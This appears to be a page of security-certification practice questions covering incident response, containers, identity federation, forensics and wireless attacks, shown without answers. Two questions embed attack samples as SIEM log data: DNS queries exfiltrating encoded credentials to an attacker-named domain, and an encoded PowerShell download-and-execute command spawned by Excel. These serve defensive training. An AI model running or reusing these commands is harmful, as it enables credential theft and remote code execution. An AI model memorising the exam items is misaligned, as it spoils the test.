All practice questions
2232 questions
A security analyst detects active data exfiltration originating from a compromised database server. Which of the following incident response steps should be taken first?
A security engineer is evaluating an enterprise microservices platform where multiple application containers share the underlying Linux host kernel. The engineer needs to enforce a control that restricts containerized application processes from issuing unauthorized or risky system calls (syscalls) directly to the host kernel. Which of the following mechanisms best satisfies this security requirement?
An application security auditor reviews network traffic logs and backend code snippets for a cloud-hosted Web API. The audit reveals two specific behaviors:
1. When a client submits a malformed query request, the server responds with an HTTP 500 Internal Server Error containing full stack traces, database schema details, and unhandled exception data.
2. The endpoint `/api/v1/account` accepts a user-supplied parameter `account_id` and retrieves requested profile records without checking whether the requesting user's token has permission to access that specific account.
Which of the following application vulnerabilities are directly illustrated by these findings? (Select TWO).
Select all that apply
A network administrator needs to ensure that a critical database server remains operational without data loss or downtime if a single internal storage drive fails. Which of the following technical controls directly provides this internal drive-level fault tolerance?
A security team is evaluating a microservices environment where untrusted code executes inside application containers on a shared host operating system. The development team asserts that Linux control groups (cgroups) and namespaces provide the same level of boundary separation as a hardware-assisted Type-1 hypervisor. Which of the following security risks should the security team highlight as the primary concern with this architecture?
A organization needs to integrate its internal directory service with external cloud services so that employees can authenticate to third-party web portals using their existing corporate credentials. Which XML-based open standard should the identity architect select to enable cross-domain single sign-on (SSO)?
A security analyst is establishing baseline service level objectives for system availability and recovery. Match each resiliency metric on the left with its corresponding definition on the right.
Click a left item, then click its matching right item
Items
Matches
A security architect is updating the network architecture for an organization that hosts public-facing web services, internal corporate workstations, and backend databases containing confidential payment data. Which of the following network segmentation controls and design practices should the architect implement to secure East-West traffic and isolate these environments? (Select TWO.)
Select all that apply
A security operations analyst is investigating an automated high-severity alert triggered by an enterprise SIEM. The alert correlated the following log entries generated by an internal host (`192.168.10.45`) across a local DNS resolver and perimeter firewall logs:
text
2026-07-27T14:15:02Z dns-core-01 named[4102]: client @0x7f8a 192.168.10.45#51204 (61646d696e2d6372656473.exfil.attacker.net): query: 61646d696e2d6372656473.exfil.attacker.net IN TXT + (10.0.0.2)
2026-07-27T14:15:05Z dns-core-01 named[4102]: client @0x7f8a 192.168.10.45#51205 (70617373776f72643132.exfil.attacker.net): query: 70617373776f72643132.exfil.attacker.net IN TXT + (10.0.0.2)
2026-07-27T14:15:09Z dns-core-01 named[4102]: client @0x7f8a 192.168.10.45#51206 (5345435245544b455931.exfil.attacker.net): query: 5345435245544b455931.exfil.attacker.net IN TXT + (10.0.0.2)
2026-07-27T14:15:12Z fw-edge-01 syslog: action="allow" src_ip=192.168.10.45 src_port=51207 dst_ip=198.51.100.53 dst_port=53 proto=UDP bytes_sent=4120 bytes_recv=8900
Based on these correlated log entries, which of the following malicious activities is taking place, and what key log feature supports this conclusion?
A cybersecurity analyst is responding to an active incident on a powered-on workstation. The analyst must capture digital evidence while strictly adhering to the order of volatility. Which of the following evidence sources should the analyst capture FIRST?
An enterprise organization is updating its hybrid storage security architecture to enhance protection for sensitive databases stored on storage area networks (SAN) and prevent unauthorized exfiltration of proprietary data. The security team requires a solution that provides dedicated hardware-backed key protection for disk volume encryption keys, as well as real-time content inspection of egress traffic to block unauthorized data transfers. Which of the following technical controls should the security architect select to meet these requirements? (Select TWO.)
Select all that apply
During a forensic investigation involving suspected corporate espionage, an incident responder must acquire evidence from an operational server processing sensitive customer data in system memory. The legal team specifies that all collected digital evidence must remain strictly admissible in judicial proceedings and verifiable against tampering throughout the evidence lifecycle. Which of the following procedures best maintains compliance with the order of volatility while establishing proper chain of custody?
A security analyst reviews a SIEM event log alert triggered by a host-based monitoring agent on a financial workstation:
text Timestamp: 2026-07-27T14:22:10Z Device: WKS-FIN-042 Event ID: 4688 (Process Creation) Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine: powershell.exe -ExecutionPolicy Bypass -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJ2h0dHA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEANQAvAHAAYQB5AGwAbwBhAGQALgBwAHMxACcAKQA= ParentProcessName: C:\Program Files\Microsoft Office\Office16\EXCEL.EXE Account Name: jdoe
Based on the correlated process creation details in this log snippet, which of the following attack scenarios is actively occurring?
An organization is updating its cybersecurity procedures to follow the standard NIST SP 800-61 incident response framework. In which sequential order should the cybersecurity team execute the four primary phases of the incident response lifecycle from beginning to end?
Drag items to arrange them in the correct order
During an operational security review, a SOC analyst identifies an unprivileged service account launching an encoded command that executes process hollowing against svchost.exe on a core database host. The analyst needs to stop active adversary command-and-control (C2) communication and prevent lateral movement immediately, while ensuring volatile memory (RAM) remains intact for live memory forensic extraction. Which of the following actions should the analyst execute FIRST using the EDR platform?
A security analyst is conducting a digital forensics collection on a Linux server suspected of being compromised by an attacker. To adhere to forensic principles regarding the order of volatility and evidence integrity, which of the following procedures should the analyst perform during the acquisition phase? (Select TWO).
Select all that apply
An Incident Response Team (IRT) responds to a active command-and-control (C2) beaconing alert on a critical internal database server. Place the following incident response actions in the correct sequential order according to the standard NIST SP 800-61 incident response lifecycle, starting with the earliest action.
Drag items to arrange them in the correct order
Match each enterprise security assessment requirement with the vulnerability scanning method or configuration best suited to satisfy it.
Click a left item, then click its matching right item
Items
Matches
A security analyst reviews wireless intrusion prevention system (WIPS) alert logs following reports of intermittent connectivity issues at a corporate office. The log reveals that multiple wireless workstations simultaneously disconnected from the corporate SSID 'Enterprise-Secure' after receiving spoofed 802.11 Subtype 12 management frames. Immediately following the disconnection, the affected workstations attempted to re-authenticate against an unauthorized access point broadcasting the same SSID on an adjacent channel, but using a degraded WPA2-PSK security mechanism instead of 802.1X WPA3-Enterprise. Which TWO of the following wireless attack indicators and techniques are demonstrated in this scenario?
Select all that apply
An enterprise security manager is evaluating a third-party cloud service provider and requires an independent audit report that verifies the operational effectiveness of the provider's security controls over a six-month testing period. Which of the following attestation reports should the security manager request?